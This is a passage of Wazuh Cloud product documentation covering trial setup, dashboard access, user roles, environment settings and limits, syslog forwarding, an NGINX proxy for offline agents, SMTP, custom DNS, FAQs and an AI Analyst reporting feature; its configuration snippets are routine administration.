    Archived data retention

    3 months

    1 Year

    1 Year

    Average/Peak Events Per Second

    100/500 EPS

    250/1250 EPS

    500/2500 EPS

    Indexed data capacity

    25 GB

    250 GB

    500 GB

    For more details about the settings and their functionality, see the Settings section.

    Note

    During the trial period, some settings are limited. However, they do not prevent you from exploring and using the Wazuh Cloud platform. All restrictions are removed once you purchase the environment.

  7. Select your pricing: Monthly or Annual. If you choose the monthly option, you will be billed monthly, whereas the annual option entails a single payment per year.

  8. Click Start your free trial to build your environment. This process might take a few minutes.

  9. Once your environment is ready, access the Wazuh dashboard and enroll agents to start monitoring your endpoints.

Create Wazuh cloud service environment

Note

If you do not enroll an agent within 3 days of starting the trial, your environment will be terminated due to inactivity.

Accessing the Wazuh dashboard

The Wazuh dashboard has a flexible and intuitive web interface that provides you access to visualizations that give you a comprehensive insight into your monitored endpoints.

Follow these steps to access the Wazuh dashboard:

  1. Log in to the Wazuh Cloud Console.

  2. Select the environment you want to access from the Environments page.

  3. Click Open Wazuh to open the Wazuh dashboard.

  4. Log in with the default credentials. You can view them by clicking Manage and selecting Default credentials on the Environments page.

Note

When accessing the Wazuh dashboard for the first time, use the default credentials. However, subsequently, you can log in using Single sign-on (SSO) if enabled or log in with the user accounts created in the Wazuh dashboard.

Changing the default credentials

For security reasons, we recommend changing the default password and creating your own users.

Follow these steps to reset the default credentials to connect to the Wazuh dashboard:

  1. Log in to the Wazuh dashboard with the default credentials.

  2. Click the wazuh_admin user on the top right corner.

  3. Click Reset password.

  4. On the Reset password page, fill in the current password and new password.

  5. Click Reset.

Note

You can access the Wazuh dashboard directly using the URL https://<CLOUD_ID>.cloud.wazuh.com, where <CLOUD_ID> is the Cloud ID of your environment. If you have any questions about the Wazuh Cloud, see the Cloud service FAQ.

Next steps

Your Wazuh Cloud environment is ready, and you can install the Wazuh agent on the endpoints you want to monitor. See the Enroll agents section to learn how to install agents.

Enrolling agents

Enrolling agents is the process of connecting your endpoints (servers, workstations, or cloud instances) to your Wazuh Cloud environment. Once enrolled, Wazuh agents begin forwarding security telemetry such as logs, vulnerabilities, and configuration data.

Deploying agent

To start using Wazuh, you need to install a Wazuh agent on your endpoint and enroll it in your environment.

Follow these steps to deploy an agent:

  1. Log into the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Agents management and select Summary.

  3. Click Deploy new agent.

  4. Follow the steps outlined on the Deploy new agent page.

Enrolling an agent
Verifying agent enrollment

Once installed, the agent automatically attempts to connect to Wazuh Cloud. Verify the enrollment by following the below steps:

  1. Log into the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Agents management and select Summary.

  3. The list of agents are displayed on the Summary page.

Verifying agent enrollment
Creating agent groups

Agent groups in Wazuh are used to organize and manage agents by grouping them based on criteria such as role, location, or system type. This allows for centralized management and tailored configuration, enabling you to apply rules, policies, and settings efficiently. New agents are automatically assigned to a default group called "default" if they are not placed in another group. Use the default group for basic monitoring first, then assign agents to more appropriate groups as needed.

To manage devices within your environment more efficiently, you can create groups and assign agents to these groups at the point of enrollment. Follow these steps to create groups on your dashboard:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Agents management and select Groups.

  3. Click Add new group on the upper right corner on the Groups page.

  4. Specify the group name and click Save new group.

Create agent group
Cloud service FAQ
What is Wazuh Cloud?

Wazuh Cloud hosts and manages all the Wazuh central components in a single platform. You create an environment, enroll Wazuh agents, and use capabilities such as security information and event management (SIEM) and extended detection and response (XDR).

Can I try it for free?

Yes, you can sign up for a 14-day free trial. No credit card is required.

Will I be charged when my trial is over?

No. We do not charge you during the trial. After the trial expiration, the default payment method will be charged. You will receive a reminder 7 days before the trial expiration. Make sure you add your billing information, otherwise your environment will be deleted completely on the expiration date.

Is Wazuh Cloud PCI DSS compliant?

Yes. Wazuh Cloud is validated as a PCI DSS Level 1 Service Provider.

Is Wazuh Cloud SOC 2 compliant?

Yes, Wazuh Cloud complies with SOC 2 standards.

How can I get support?

Support is included after your first payment. Contact us from the Help section in the Wazuh Cloud Console. You can also fill out this form to get help from the Wazuh team.

Where is Wazuh Cloud hosted?

Wazuh Cloud is hosted on Amazon Web Services (AWS).

What is a profile?

A profile is a predefined set of settings for a Wazuh Cloud environment. We offer three profiles: Small, Medium, and Large. They provide ready-to-use environment templates that cater to different needs and requirements. If none fits your requirements, configure the settings individually.

What is a setting?

A setting is a configuration option for a Wazuh Cloud environment. Settings define limits and functionality. For example, the Active agents setting specifies the maximum number of active agents in your environment. Your chosen settings affect pricing.

What is the indexed data?

Indexed data (previously hot storage) is the data available on the Wazuh dashboard. Wazuh ingests events from agents, indexes them, and makes them searchable and analyzable.

What is the archive data?

Wazuh archives data in an AWS S3 bucket for long‑term storage. Unlike indexed data, archive data is not searchable or analyzable. It consists of compressed files. For more information, see the Archive data section.

What happens if the tier limit is reached?

See What happens if the indexed data capacity setting is reached?.

What happens if the indexed data capacity setting is reached?

When the indexed data capacity is reached, Wazuh automatically removes the oldest events from the index. The removed data remains available as archive data. See the Archive data section to learn more.

How is indexed data rotated?

Rotation depends on two conditions: indexed data retention and indexed data capacity. For example, with 3‑month retention and 100 GB capacity, if you use 100 GB in the first month, rotation starts immediately. If you use only 20 GB, data from month one rotates at month four.

What happens if the average/peak EPS is exceeded?

If incoming events per second exceed the average/peak EPS setting, events queue. When the queue is full, Wazuh discards new events, which can cause event loss.

Can I increase the average/peak EPS?

See Adjusting environment settings.

Can I cancel at any time?

Yes. You can cancel at any time with no penalty. You can use your environment until the end of your current billing cycle, and no future charges are incurred after this period.

Your environment

The Wazuh Cloud environment contains all the Wazuh components ready for you to use.

Learn more about your environment in the sections below.

Authentication and authorization

You can use the native support for managing and authenticating users or integrate with external user management systems.

Note

You cannot log in to the Wazuh dashboard with your Wazuh Cloud account credentials. To log in to the Wazuh dashboard, use the default credentials from the Wazuh Cloud Console or credentials for a dashboard user you created.

Native support for users and roles

The Wazuh dashboard allows you to add users, create roles, and map roles to users. The following sections highlight more on this.

Creating an internal user

Follow these steps to create an internal user.

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Indexer management and select Security.

  3. Select Internal users on the left pane, click Create internal user and complete the fields.

  4. Click Create to complete the action.

    Create internal user
Managing Wazuh indexer roles

Indexer roles are the core way of controlling access to your Wazuh indexer cluster. Roles contain any combination of cluster-wide permission, index-specific permissions, document and field-level security, and tenants. These roles define what a user can query, view, or manage within the indexer (logs, alerts, dashboards).

Note

You cannot customize reserved roles. Create a custom role with the same permissions or duplicate a reserved role to customize it. Then you map users to these roles so that users gain those permissions.

Follow these steps to create an indexer role using existing roles templates:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Indexer management and select Security.

  3. Click on Roles on the left panel and select a role with the required permissions.

  4. Click Actions at the top section and select Duplicate.

  5. Fill in the required information on the Duplicate Role page.

  6. Click Create to complete the process.

    Managing indexer roles
Mapping users to Wazuh indexer roles

Wazuh indexer role mappings are how users are granted access to indexed data in Wazuh. While indexer roles define the set of permissions available (such as searching logs, viewing alerts, or managing index patterns), role mappings connect those roles to individual users or user groups. This allows administrators to control who can query data, build dashboards, or access specific indices.

Follow these steps to map users to appropriate indexer roles:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Indexer management and select Security.

  3. Click on Roles on the left panel and search for the role created previously.

  4. Click the role name to open the window.

  5. Select the Mapped users tab and click Manage mapping.

  6. Add the internal user and click Map to confirm the action.

    Mapping users to Wazuh indexer roles
Managing Wazuh server roles

Wazuh server roles are the primary way of controlling access to the Wazuh platform. They define what actions a user can perform within the Wazuh server and dashboard. Server roles may include permissions to manage agents, configure rules, adjust settings, or perform read-only operations. By assigning roles, administrators can control who is allowed to view alerts, enroll or remove agents, modify security configurations, or access sensitive management functions.

Note

Policies assigned during a role creation define the permissions associated with the role. Explore the Policies pane before creating a role to understand the actions and other components that make a policy.

In most cases, the available roles are sufficient for day to day operations. However, depending on user requirements, new roles can be created.

Follow these steps to create a server role:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Server management and select Security.

  3. On the Security page, go to the Roles pane.

  4. Click Create role.

  5. Provide a name for the new role and select your preferred policies from the list.

  6. Click Create role to complete the process.

    Managing Wazuh server roles
Mapping users to Wazuh server roles

Wazuh server role mappings are how permissions are assigned to users in the Wazuh platform. While server roles define what actions are possible, role mappings connect those roles to specific users or user groups. This ensures that the right people have the appropriate level of access to manage agents, configure rules, or view alerts. By managing role mappings, administrators control who can perform operational and administrative tasks within Wazuh.

Follow these steps to map users to server roles:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Server management and select Security.

  3. On the Security page, go to the Roles mapping pane.

  4. Click Create Role mapping.

  5. Assign a name to the role mapping.

  6. Select the roles you want to map the user with.

  7. Select the internal user.

  8. Click Save role mapping to save and map the user with the role.

    Mapping users to Wazuh server roles
Creating and setting a Wazuh admin user

Follow the steps in the Creating an internal user section to create an internal user. Once the user has been created, follow these steps to create the required indexer role and map the created user to the role:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Indexer management and select Security.

  3. Click Roles to open the page and search for the all_access role in the list.

  4. Select it, click Actions and select Duplicate.

  5. Assign a name to the new role, then click Create to confirm the action.

  6. On the newly created role page, select the Mapped users tab and click Manage mapping.

  7. Add the user and click Map to confirm the action.

    Creating and setting a Wazuh admin user

Follow these steps to create the required server role mapping, and map the user with the role to assign admin permissions:

  1. Click the upper-left menu icon , expand Server management and select Security.

  2. On the Security page, go to the Roles mapping pane.

  3. Click Create Role mapping.

  4. Assign a name to the role mapping.

  5. Select administrator in the role field.

  6. Select the internal user.

  7. Click Save role mapping to save and map the user as an administrator.

    Creating server role mapping
Creating and setting a Wazuh read-only user

Follow the steps in the Creating an internal user section to create an internal user. Once the user has been created, follow these steps to create the required indexer role and map the created user to the role:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon , expand Indexer management and select Security.

  3. Click Roles to open the page and click Create role.

  4. Assign a name to the new role.

  5. Select the following options in the empty fields:

    1. Cluster permissions: cluster_composite_ops_ro

    2. Index: *

    3. Index permissions: read

    4. Tenant permissions: global_tenant and select the Read only option.

  6. Click Create to complete the process.

  7. On the newly created role page, select the Mapped users tab and click Manage mapping.

  8. Add the user and click Map to confirm the action.

    Creating and setting a Wazuh read-only user

Follow these steps to create the required server role mapping, and map the user with the role to assign read-only permissions:

  1. Click the upper-left menu icon , expand Server management and select Security.

  2. Go to the Roles mapping pane on the Security page.

  3. Click Create Role mapping.

  4. Assign a name to the role mapping.

  5. Select readonly in the role field.

  6. Select the internal user.

  7. Click Save role mapping to save and map the user with the read-only role.

    Creating server role mapping

To add more read-only users, you can skip the role creation task and map the users to the already existing read-only role.

Integrating with external user management systems

In many organizations, user access is centrally managed through directory services such as Active Directory, Keycloak, or other identity providers. Integrating Wazuh Cloud with these external systems ensures that authentication and authorization are consistent with existing security policies. This approach simplifies user management, improves compliance, and reduces the overhead of maintaining separate accounts just for Wazuh.

Wazuh Cloud supports integration with external user management systems such as LDAP for authentication. To enable this feature, open a support ticket through the Help section in your Wazuh Cloud Console, and the Wazuh Support team will guide you through the setup process.

Settings

Every cloud environment is configured based on specific settings that define its limitations and pricing. We offer six settings, comprising four basic and two advanced settings. Advanced settings are calculated from basic settings, but you can modify them.

To monitor your environment and check whether settings are being reached, see the Monitor usage section.

Understanding environment settings
Active agents

This basic setting sets the maximum count of active Wazuh agents that the environment can support. Please note that while registering an unlimited number of Wazuh agents is possible, the active agent count is limited by this setting.

If the maximum number of active agents is reached, the environment might start to malfunction, causing instability with agent connections. Although the system can temporarily handle exceeding the active agent limit, appropriate measures will be taken if the situation persists.

Indexed data

Indexed data is the data available on the Wazuh dashboard. Wazuh ingests events from agents, indexes them, and makes them searchable and analyzable.

Two settings define indexed data behavior:

  • Indexed data retention: It determines the maximum duration for which data remains indexed. This is a basic setting.

  • Indexed data capacity: It defines the maximum size, in bytes, of the indexed data. This is an advanced setting, and the interface provides a suggestion when selecting the Indexed data retention.

Data remains indexed until retention or capacity is reached. When either is reached, rotation removes the oldest data until the condition clears.

To configure index management policies, see Index lifecycle management documentation.

Archive data

This basic setting (previously cold storage) defines how long Wazuh stores analyzed data in an AWS S3 bucket. Unlike indexed data, archive data is not searchable or analyzable. It is a set of compressed files.

When the specified retention period has passed, Wazuh removes any archived files that are older than the configured time window.

Support plan

This setting indicates whether the support level is premium or standard.

Average/Peak EPS

This advanced setting is the average and maximum number of events per second (EPS) the environment analyzes. The interface suggests a value when you select the Active agents setting.

If ingestion exceeds the peak EPS, events queue. When the queue is full, Wazuh discards new events, which causes event loss. Queueing is managed automatically by the cloud service, ensuring optimal resource utilization.

The environment is configured with the limits eps option using the following parameters:

  • timeframe = 1 seconds

  • maximum = Peak EPS / number of server nodes

The number of server nodes is automatically determined by the cloud service based on the workload. For instance, if the Average/Peak EPS setting is 100/500 EPS and there is a cluster of 2 nodes at the current time, each node can process up to 250 events per second (500 peak EPS / 2 server nodes).

Adjusting environment settings

Managing your environment settings is crucial to meeting your evolving needs and optimizing the performance of your cloud environment. While some settings can be determined upfront, such as the number of active agents, indexed data retention, archive data, and support plan, it's important to note that these requirements may change over time.

Advanced settings might be more challenging to determine in advance. While the interface provides recommendations based on our experience, your specific workload might differ. Hence, we recommend deploying, monitoring, and adjusting the settings as needed to align with your evolving requirements.

To change a setting, open a support ticket. Here is the breakdown of the process:

  • Upgrading a setting: If you upgrade a setting, you are charged a prorated amount for the remainder of the current billing cycle. The change takes effect immediately after payment and your next billing cycle reflects the higher cost.

  • Downgrading a setting: If you downgrade a setting, the change takes effect at the start of the next billing cycle, and your cost is reduced accordingly.

Before any changes or payments are made, we confirm requested changes with you before applying them to ensure accuracy and alignment with your requirements.

By monitoring your environment and making necessary adjustments to the settings, you can ensure that your cloud environment remains optimized and aligned with your evolving needs.

Limits

Wazuh Cloud defines limits for key metrics that affect performance and capacity. You cannot change these limits. If an environment reaches a limit, the service might restrict activity. Contact Wazuh Support for help.

Limit definitions

The following limits apply to specific functionality and APIs in Wazuh Cloud.

Dashboards, visualizations, and queries

This limit governs concurrent execution of dashboards, visualizations, and queries. Wazuh Cloud maintains performance and responsiveness, but user‑created queries and visualizations also affect efficiency. Optimize your queries and visualizations to improve performance.

API rate limits

APIs include rate limits to prevent abuse and maintain performance and stability. A rate limit sets the maximum requests per second for a given API. Hitting these limits is rare. They protect the system and help ensure a smooth experience.

The following APIs have rate limits:

  • Agent registration: This controls the maximum rate of registration requests processed per second, ensuring a seamless onboarding process for agents connecting to the Wazuh Cloud environment.

  • Wazuh server API: This specifies the maximum requests allowable per second to the Wazuh server API, ensuring its stability and availability.

  • Wazuh indexer API: This sets the maximum requests allowed per second to the Wazuh indexer API, enabling efficient retrieval and manipulation of indexed data.

  • Access to the Archive data: This sets the maximum requests processed per second for accessing archive data, ensuring efficient retrieval when necessary.

Limitations

Wazuh Cloud is designed as a managed service, meaning that the Wazuh team takes responsibility for infrastructure management, scaling, updates, and security hardening. While this reduces operational overhead for users, it also means that access to certain components of the platform is intentionally limited. These safeguards ensure multi-tenant security, platform stability, and compliance with industry standards.

Dashboard access only

Users interact with Wazuh Cloud exclusively through the Wazuh dashboard and the ports required for agent communication.

Restricted API access
  • The Wazuh Server API and Wazuh indexer API are not accessible by default.

  • Access to these APIs can be enabled on request through Wazuh Support.

  • Even when enabled, only read operations are supported; direct write operations to the indexer API are not permitted.

No CLI access

Users do not have direct command-line or shell access to the underlying cloud infrastructure. This ensures that the environment remains secure, stable, and consistent across tenants.

These restrictions are in place to protect the integrity of the platform and to provide a reliable managed service experience. If you need functionality beyond these defaults, contact Wazuh support to discuss available options.

Cancellation

To cancel your environment:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Environments page and select your environment.

  3. Click Manage and select Cancel environment.

  4. On the next prompt, you are asked to confirm if you would like to cancel the environment.

  5. Type CANCEL in the box provided to confirm the cancellation.

  6. Click Cancel to confirm this action.

  7. The environment is removed at the end of the billing cycle.

Create internal user

Warning

The cancellation cannot be undone, and all data is completely deleted with this action.

Monitor usage

This section provides details on using your environment, helping you to optimize its performance.

Viewing environment usage metrics

To see metrics of your Wazuh Cloud environment, follow these steps:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Environments page and select your specific environment.

  3. Click on the Metrics tab.

Agents metric

The Agents metric shows the number of Wazuh agents in the active, disconnected, never connected, and pending states. It also displays the limit of active agents, which is configurable through the active agents setting.

Exceeding the active agents limit might cause operational issues and decrease system stability. Though the system can handle a temporary surplus of active agents, we advise immediate action:

  • Upgrade the active agents setting to match the actual count.

  • Reduce active agents.

This ensures a smooth operation and stability of your environment.

Data indexed metric

The data indexed metric presents a histogram that shows how much security data has been indexed in your environment over time:

  • X-axis: time

  • Y-axis: indexed data volume (in gigabytes)

  • It also displays the date of the oldest indexed alert currently stored.

This metric helps you verify whether your indexed data capacity and indexed data retention are sufficient for your needs. The Wazuh Cloud environment automatically rotates (deletes) data when either:

  • The used storage exceeds the configured indexed data capacity, or

  • The alert date exceeds the configured indexed data retention period.

How to interpret this metric:

  • If your environment age is less than the configured retention period, the oldest alert date should align with the environment age.

  • If your environment age is greater than or equal to the retention period, the oldest alert date should align with the retention period.

In both cases, your configuration is working correctly and no action is required. If the oldest alert date does not align with either, it indicates premature data rotation. In this case, you should:

  • Increase the indexed data capacity, or

  • Adjust your rule configurations to filter out less critical events and reduce data volume.

Note

Oldest alert date never exceeds the configured retention period, rotation enforces this limit.

Monitoring the data indexed metric ensures that your storage and retention settings continue to match your operational needs. If usage trends change, you can upgrade or downgrade your environment's settings to maintain optimal performance and data availability.

Events - Dropped over time and Events - Processed vs dropped metrics

The Wazuh Cloud dashboard provides two key metrics to help you understand the efficiency of event ingestion and processing in your environment:

  • Events - Dropped over time: A histogram that shows the number of events lost or dropped during a given period. Drops occur when the rate of incoming events exceeds the environment's configured average/peak EPS (events per second) limit. When this happens, the event queues fill up, and additional events are discarded.

  • Events - Processed vs dropped: A pie chart that compares the proportion of successfully processed events against those that were dropped. This provides a quick visual summary of overall event handling performance.

Consistent or frequent event drops indicate that your environment may not be able to handle the current event rate. If this continues, important alerts could be lost, reducing visibility into your security posture.

If you observe a pattern of drops in these metrics, consider the following actions to address this:

  • Increase the EPS setting: Adjust the average/peak EPS configuration to better align with your actual event rate. This ensures your environment can process more events without loss.

  • Review agent configuration: Some agents may be sending excessive or unnecessary data. Tune their configuration to reduce noise, such as by filtering out less critical events before they are sent.

  • Use the leaky bucket algorithm: Implement a leaky bucket configuration on agents to smooth out event flow. This prevents sudden spikes in event bursts that could overwhelm queues and cause drops.

By combining these strategies, you can ensure that your environment remains within its processing limits, reducing the risk of lost events while maintaining efficient and reliable event ingestion.

Forward syslog events

Wazuh agents can run on a wide range of operating systems, but when it is not possible due to software incompatibilities or business restrictions, you can forward syslog events to your environment. This is a common use case for network devices such as routers or firewalls.

Since every communication with your environment is performed through the Wazuh agent, you must configure the agent to forward the syslog events. To do so, you have these options:

Rsyslog on Linux

Use rsyslog on a Linux endpoint with a Wazuh agent to log to a file and send those logs to the environment.

  1. Configure rsyslog to receive syslog events and enable the TCP or UDP settings by editing the /etc/rsyslog.conf file.

    • For TCP:

      $ModLoad imtcp
      $InputTCPServerRun <PORT>
      
    • For UDP:

      $ModLoad imudp
      $UDPServerRun <PORT>
      

    Note

    Make sure to review your firewall/SELinux configuration to allow this communication.

  2. Configure rsyslog to forward events to a file by editing the /etc/rsyslog.conf file.

    # Storing Messages from a Remote System into a specific File
    if $fromhost-ip startswith '<REMOTE_DEVICE_IP>' then /var/log/<FILE_NAME>.log
    & ~
    

    To perform the following steps, make sure to replace <FILE_NAME> with the name chosen for this log and <REMOTE_DEVICE_IP> with the IP address of the remote system.

  3. Deploy a Wazuh agent on the same endpoint with rsyslog installed.

  4. Configure the agent to read the syslog output file by editing the /var/ossec/etc/ossec.conf file.

    <localfile>
      <log_format>syslog</log_format>
      <location>/var/log/<FILE_NAME>.log</location>
    </localfile>
    
  5. Run the commands below to restart rsyslog and the Wazuh agent:

    # systemctl restart rsyslog
    # systemctl restart wazuh-agent
    
Logstash on Windows

Use Logstash on a Windows endpoint with a Wazuh agent to receive syslog, log to a file, and send those logs to the environment.

  1. Install Logstash.

    1. Download the Logstash ZIP package.

    2. Extract the ZIP contents into a local folder, for example, to C:\logstash\.

  2. Configure Logstash.

    1. Create the following file: C:\logstash\config\logstash.conf

      input {
         syslog {
            port => <PORT>
         }
      }
      
      output {
         file {
            path => "C:\logstash\logs\<FILE_NAME>.log"
            codec => "line"
         }
      }
      
    2. Ensure to replace <FILE_NAME> with the name chosen for this log.

  3. Deploy a Wazuh agent on the same endpoint that has Logstash.

  4. Configure the Wazuh agent to read the Logstash output file by adding the following configuration to the C:\Program Files (x86)\ossec-agent\ossec.conf file:

    <ossec_config>
      <localfile>
         <log_format>syslog</log_format>
         <location>C:\logstash\logs\<FILE_NAME>.log</location>
      </localfile>
    </ossec_config>
    
  5. Restart Logstash.

    1. Run Logstash from the command line:

      C:\logstash\bin\logstash.bat -f C:\logstash\config\logstash.conf
      

      Note

      Closing the terminal where Logstash is running terminates it.

    2. Install Logstash as a Windows Service either using NSSM or Windows Task Scheduler.

  6. Restart the Wazuh agent.

    Restart-Service Wazuh
    
Agents without Internet access

In many organizations, certain systems, especially those in restricted, segmented, or highly secure networks do not have direct access to the Internet. These systems still generate important security events that need to be monitored by Wazuh.

Wazuh Cloud supports secure methods to ensure that such isolated or private network agents can still send their data to your cloud environment. This enables visibility across your infrastructure, even for systems operating in air-gapped or compliance-restricted environments. The following options are available for this purpose:

Using a forwarding proxy

It is possible to access your environment using an NGINX forwarding proxy.

Using an NGINX forwarding proxy

To achieve this configuration, follow these steps:

  1. Deploy a new instance in a public subnet with internet access.

  2. Install NGINX on your instance following the NGINX documentation.

  3. Configure NGINX.

    1. Add the following lines to the HTTP section in your NGINX configuration, located in the /etc/nginx/nginx.conf file. This configuration enables Nginx to extract and use the real client IP address from the X-Forwarded-For header and sets restrictions on which real IP addresses are accepted as valid.

      http{
      real_ip_header X-Forwarded-For;
      set_real_ip_from <nginx_ip>;
         }
      
    2. Add the following block to the end of the NGINX configuration file /etc/nginx/nginx.conf and replace <CLOUD_ID> with the Cloud ID of your environment. This configuration enables stream proxying, where incoming traffic on specific ports is forwarded to the corresponding upstream servers (master or mycluster). This is based on the port numbers, 1515 and 1514 specified in the listen directive.

        stream {
          upstream master {
            server <CLOUD_ID>.cloud.wazuh.com:1515;
          }
          upstream mycluster {
            server <CLOUD_ID>.cloud.wazuh.com:1514;
            }
          server {
            listen nginx_ip:1515;
            proxy_pass master;
          }
          server {
            listen nginx_ip:1514;
            proxy_pass mycluster;
          }
        }
      
    3. Restart the NGINX service.

      # systemctl restart nginx
      
    4. Enroll your agent with the IP address of the NGINX instance. To learn more about registering agents, see the Enroll agents section.

      Example:

      # WAZUH_MANAGER_IP=<NGINX_IP_ADDRESS> \
      WAZUH_PASSWORD="<PASSWORD>" \
      yum install wazuh-agent
      

      Replace <PASSWORD> with your Wazuh server enrollment password.

SMTP configuration

Wazuh can be configured to send email alerts to one or more email addresses when certain rules are triggered or for daily event reports.

This configuration requires an SMTP and you can use your own SMTP or the Wazuh Cloud SMTP.

Note

If your SMTP requires authentication, you need to open a ticket through the Help section of your Wazuh Cloud Console to configure it.

The Wazuh Cloud SMTP is limited to 100 emails per hour, regardless of the email_maxperhour setting. To enable the Wazuh Cloud SMTP, configure the following settings:

<global>
  . . .
  <smtp_server>wazuh-smtp</smtp_server>
  <email_from>no-reply@wazuh.com</email_from>
  ...
</global>

The Wazuh Cloud SMTP is now successfully configured.

Custom DNS

By default, Wazuh Cloud environments are accessed through a subdomain of cloud.wazuh.com.

You can configure your environment to use your own custom domain. To do this, go to the Wazuh Cloud Console under the environment details page. You need to provide the following:

  • Certificate: SSL/TLS certificate for your domain

    • Must use SHA2

    • Must use RSA with key size of at least 2048 bits

    • TLS Web Server Authentication is required if using EKU

    • Must contain domain name in CN or SAN field(s)

    • Must be PEM encoded

  • Private Key: Associated with the provided certificate

    • Must not be encrypted or require a passphrase

    • Must be PEM encoded

  • Certificate Chain: Used to sign your certificate

    • Must contain all intermediate certificates in the certificate chain

    • Must be signed by a trusted certificate authority

    • Must be PEM encoded

After providing the above and applying the configuration, create a CNAME DNS record using the value provided by the Wazuh Cloud Console.

Note

Your Wazuh Cloud environment is still accessible through the default URL, even if you have configured a custom domain.

Technical FAQ
How can I send data to my environment?

All the communications are performed through Wazuh agents once they are registered to the environment.

Is it possible to change the URL to access the environment?

It is possible to get a new URL by opening a support ticket through the Help section on the Wazuh Cloud Console, but the previous URL is also kept.

What happens if the tier limit is reached?

See What happens if *indexed data capacity* setting is reached?

What happens if indexed data capacity setting is reached?

When the selected indexed data capacity is reached, the oldest events will be automatically removed from your index regardless of the index data time. This data is available in archive data for you to access. See the Archive data section to learn more about data logging and storage.

Can I index the archive data again?

It is possible to download the data from the archive data and re-index it into your local environments. However, it isn't possible to re-index it in your cloud environment.

What if I need to change the size of my tier?

See What if I need to upgrade or downgrade a setting?

What if I need to upgrade or downgrade a setting?

You can upgrade or downgrade a setting by contacting the Wazuh team through the Help section of your Wazuh Cloud Console. See also Adjusting environment settings.

What happens if active agents setting is reached?

If the maximum number of active agents is reached, the environment may start to malfunction, causing instability with agent connections. While the system can tolerate temporarily exceeding the limit of active agents, appropriate measures will be taken if the situation persists.

What happens if average/peak EPS setting is reached?

If the data ingestion is exceeded, events start to queue. If the queue becomes full, Wazuh discards the incoming events, which might lead to event loss. The cloud service automatically manages the queuing mechanism, ensuring optimal resource usage.

How do I get SSH access to my environment?

SSH access is not allowed for security reasons. Environments are managed from the Wazuh Cloud Console and Wazuh dashboard. See the Limitations section for more information.

How can I update my environment?

Wazuh takes care of the updates, so your environment gets the latest version of Wazuh with no downtime.

Can I send syslog data directly to the environment?

No, all the communications are performed through Wazuh agents once they are registered into the environment. However, you have alternative options. For more information on how to forward syslog events to your environment, see the Forward syslog events section.

Can I send data directly to the Wazuh indexer of my environment?

No, all the communications are performed through Wazuh agents.

Can I integrate with my Single Sign-On (SSO) method (LDAP, Okta, Active Directories)?

Yes, you can access the Wazuh WUI of your environment through your SSO tool. To perform this action, you need to contact the Wazuh Support team through the Help section of your Wazuh Cloud Console.

Do I have access to Wazuh API?

You have access to the Dev tools through your Wazuh dashboard, where you can use the server API. The Wazuh server API is not exposed, but you can contact the Wazuh team through the Help section of your Wazuh Cloud Console to allow Wazuh server API access from a specific IP address. See the Limitations section for more information.

Do I have access to Wazuh indexer API?

The Wazuh indexer API is not accessible by default. If you want to access it, contact the Wazuh team through the Help section of your Wazuh Cloud Console to authorize the connection from a specific IP address. After authorization is granted, you have access to the GET methods of the Wazuh indexer API. See the Limitations section for more information.

How can I forward my logs to another solution or SOC?

You can download your data from archive data. Then, you can push it to other solutions or Security Operations Center (SOC).

Is my environment shared with other customers?

No, your environment is isolated from other customers. That means your account is the only one with access to your environment.

What are the available regions?

Available regions:

Asia Pacific

  • Tokyo: ap-northeast-1

  • Mumbai: ap-south-1

  • Singapore: ap-southeast-1

  • Sydney: ap-southeast-2

Europe

  • Frankfurt: eu-central-1

  • London: eu-west-2

North America

  • Canada: ca-central-1

  • North Virginia: us-east-1

  • Ohio: us-east-2

When selecting a region to host your environment, if you are not sure which one is the best option for you, select one that is the closest to your location since this typically reduces latency for indexing and search requests.

What status can my environment have?

Status

Description

Creating

Your environment is being created.

Ready

Your environment was created successfully and is ready to use.

Failed

The creation of your environment failed.

Maintenance

Your environment is under maintenance. It will be available when finished.

Suspending

Your environment is being suspended due to lack of payment.

Suspended

Your environment is suspended.

Resuming

Your environment is resuming after suspension. It will be available soon.

Terminated

Your environment was deleted.

AI Analyst

The Wazuh AI Analyst service provides Wazuh Cloud users with insights into their security posture and offers recommendations on how to remediate threats detected within their Wazuh Cloud subscription.

This service is an automated AI-powered security analysis solution that integrates Wazuh Cloud with AI models. It leverages machine learning capabilities to process security data and deliver actionable insights to help improve organizational security.

The service provides organizations with:

  • Automated security analysis without manual intervention.

  • Insights aggregated from multiple security data sources.

  • Structured recommendations to improve security posture.

  • Regular assessments of security posture through scheduled analyses.

The service periodically sends emails and reports. You can download these reports from the Wazuh Cloud Console.

AI Analyst email

Users receive periodic emails with key performance indicators and a summary of their security posture. Each email includes:

  • A histogram showing the number of protected endpoints.

  • The volume of alerts received by the Wazuh server.

  • The number of active vulnerabilities.

  • A summary of the current security posture.

  • The AI Analyst report attached as a PDF.

AI Analyst report

The report includes AI-generated insights based on data from the user's Wazuh Cloud subscription. It contains the following sections:

  • Overall assessment

  • Alert analysis

  • Vulnerability analysis

  • Endpoint analysis

Overall assessment

A summary generated by the AI, providing an overall evaluation of the organization's security posture during the reporting period.

Alert analysis

Wazuh analyzes log data collected across the monitored infrastructure. Each log is evaluated against predefined security rules, each tagged with a criticality level. This section presents alert data analysis by MITRE technique and alert level, along with a summary of recommended actions.

Vulnerability analysis

Software vulnerabilities are weaknesses in code that attackers can exploit to gain unauthorized access or alter application behavior. Vulnerable software applications are commonly targeted by attackers to compromise endpoints and gain a persistent presence on targeted networks.

Endpoint analysis

Highlights the ten most active endpoints based on alert volume. This helps identify areas with elevated security activity.

Generating the report

Follow the steps below to generate the AI analyst report for your environment:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Environments page and select your specific environment.

  3. Navigate to the AI Reports tab.

  4. Click on the available report to view and download the report as a PDF file.

Generating the report
Data privacy and security FAQ
Is data from Wazuh Cloud subscriptions shared with third parties?

